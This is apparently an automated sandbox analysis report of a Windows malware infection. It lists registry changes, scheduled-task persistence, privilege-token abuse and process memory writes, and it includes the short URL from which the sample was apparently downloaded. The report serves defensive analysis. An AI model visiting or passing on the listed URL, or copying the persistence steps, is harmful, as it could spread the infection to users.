Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" OZhxUQi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket OZhxUQi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" XPYXLum.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe -
Modifies registry class 9 IoCs
Processes:
msedge.exeMiniSearchHost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" msedge.exe Key created \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children msedge.exe Key created \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage msedge.exe Key created \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children msedge.exe Key created \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe Key created \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" msedge.exe -
Processes:
setup.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe -
NTFS ADS 1 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\setup_34Uv1hLE7B.zip:Zone.Identifier msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3260 schtasks.exe 3112 schtasks.exe 1932 schtasks.exe 2208 schtasks.exe 3456 schtasks.exe 3600 schtasks.exe 5776 schtasks.exe 5156 schtasks.exe 4212 schtasks.exe 1128 schtasks.exe 6004 schtasks.exe 2488 schtasks.exe 3716 schtasks.exe 5972 schtasks.exe 5536 schtasks.exe 2344 schtasks.exe 896 schtasks.exe 5716 schtasks.exe 4088 schtasks.exe 1588 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exesetup_34Uv1hLE7B.tmpdjminoradequate.exemsedge.exepowershell.exepowershell.exepowershell.exe07FQtEghQ.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEXPYXLum.exepid process 3628 msedge.exe 3628 msedge.exe 2808 msedge.exe 2808 msedge.exe 380 identity_helper.exe 380 identity_helper.exe 5164 msedge.exe 5164 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 2084 msedge.exe 2084 msedge.exe 6088 setup_34Uv1hLE7B.tmp 6088 setup_34Uv1hLE7B.tmp 5828 djminoradequate.exe 5828 djminoradequate.exe 5828 djminoradequate.exe 5828 djminoradequate.exe 6048 msedge.exe 4144 powershell.exe 1868 powershell.exe 1868 powershell.exe 4144 powershell.exe 1868 powershell.exe 2028 powershell.exe 2028 powershell.exe 4144 powershell.exe 2028 powershell.exe 3576 07FQtEghQ.exe 3576 07FQtEghQ.exe 3576 07FQtEghQ.exe 3576 07FQtEghQ.exe 3576 07FQtEghQ.exe 5300 powershell.exe 5300 powershell.exe 5300 powershell.exe 4144 powershell.exe 4144 powershell.exe 4144 powershell.exe 5828 djminoradequate.exe 5828 djminoradequate.exe 5828 djminoradequate.exe 5828 djminoradequate.exe 4212 powershell.exe 4212 powershell.exe 4212 powershell.exe 3132 powershell.exe 3132 powershell.exe 3132 powershell.exe 2400 powershell.EXE 2400 powershell.EXE 2400 powershell.EXE 2984 XPYXLum.exe 2984 XPYXLum.exe 2984 XPYXLum.exe 2984 XPYXLum.exe 2984 XPYXLum.exe 2984 XPYXLum.exe 2984 XPYXLum.exe 2984 XPYXLum.exe 2984 XPYXLum.exe 2984 XPYXLum.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs
Processes:
msedge.exemsedge.exemsedge.exepid process 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exepowershell.exepowershell.exepowershell.EXEpowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4144 powershell.exe Token: SeDebugPrivilege 1868 powershell.exe Token: SeDebugPrivilege 2028 powershell.exe Token: SeDebugPrivilege 5300 powershell.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeIncreaseQuotaPrivilege 5456 WMIC.exe Token: SeSecurityPrivilege 5456 WMIC.exe Token: SeTakeOwnershipPrivilege 5456 WMIC.exe Token: SeLoadDriverPrivilege 5456 WMIC.exe Token: SeSystemProfilePrivilege 5456 WMIC.exe Token: SeSystemtimePrivilege 5456 WMIC.exe Token: SeProfSingleProcessPrivilege 5456 WMIC.exe Token: SeIncBasePriorityPrivilege 5456 WMIC.exe Token: SeCreatePagefilePrivilege 5456 WMIC.exe Token: SeBackupPrivilege 5456 WMIC.exe Token: SeRestorePrivilege 5456 WMIC.exe Token: SeShutdownPrivilege 5456 WMIC.exe Token: SeDebugPrivilege 5456 WMIC.exe Token: SeSystemEnvironmentPrivilege 5456 WMIC.exe Token: SeRemoteShutdownPrivilege 5456 WMIC.exe Token: SeUndockPrivilege 5456 WMIC.exe Token: SeManageVolumePrivilege 5456 WMIC.exe Token: 33 5456 WMIC.exe Token: 34 5456 WMIC.exe Token: 35 5456 WMIC.exe Token: 36 5456 WMIC.exe Token: SeIncreaseQuotaPrivilege 5456 WMIC.exe Token: SeSecurityPrivilege 5456 WMIC.exe Token: SeTakeOwnershipPrivilege 5456 WMIC.exe Token: SeLoadDriverPrivilege 5456 WMIC.exe Token: SeSystemProfilePrivilege 5456 WMIC.exe Token: SeSystemtimePrivilege 5456 WMIC.exe Token: SeProfSingleProcessPrivilege 5456 WMIC.exe Token: SeIncBasePriorityPrivilege 5456 WMIC.exe Token: SeCreatePagefilePrivilege 5456 WMIC.exe Token: SeBackupPrivilege 5456 WMIC.exe Token: SeRestorePrivilege 5456 WMIC.exe Token: SeShutdownPrivilege 5456 WMIC.exe Token: SeDebugPrivilege 5456 WMIC.exe Token: SeSystemEnvironmentPrivilege 5456 WMIC.exe Token: SeRemoteShutdownPrivilege 5456 WMIC.exe Token: SeUndockPrivilege 5456 WMIC.exe Token: SeManageVolumePrivilege 5456 WMIC.exe Token: 33 5456 WMIC.exe Token: 34 5456 WMIC.exe Token: 35 5456 WMIC.exe Token: 36 5456 WMIC.exe Token: SeDebugPrivilege 4212 powershell.exe Token: SeDebugPrivilege 3132 powershell.exe Token: SeDebugPrivilege 2400 powershell.EXE Token: SeDebugPrivilege 1448 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2096 WMIC.exe Token: SeIncreaseQuotaPrivilege 2096 WMIC.exe Token: SeSecurityPrivilege 2096 WMIC.exe Token: SeTakeOwnershipPrivilege 2096 WMIC.exe Token: SeLoadDriverPrivilege 2096 WMIC.exe Token: SeSystemtimePrivilege 2096 WMIC.exe Token: SeBackupPrivilege 2096 WMIC.exe Token: SeRestorePrivilege 2096 WMIC.exe Token: SeShutdownPrivilege 2096 WMIC.exe Token: SeSystemEnvironmentPrivilege 2096 WMIC.exe Token: SeUndockPrivilege 2096 WMIC.exe Token: SeManageVolumePrivilege 2096 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2096 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exesetup_34Uv1hLE7B.tmpTVCwEHwXmrhkdZhEKh.tmpmsedge.exepid process 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 6088 setup_34Uv1hLE7B.tmp 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 5208 TVCwEHwXmrhkdZhEKh.tmp 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe -
Suspicious use of SendNotifyMessage 56 IoCs
Processes:
msedge.exemsedge.exemsedge.exepid process 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
MiniSearchHost.exepid process 1432 MiniSearchHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 2808 wrote to memory of 5788 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 5788 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3628 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3628 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1IZk1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd200c3cb8,0x7ffd200c3cc8,0x7ffd200c3cd82⤵PID:5788
-
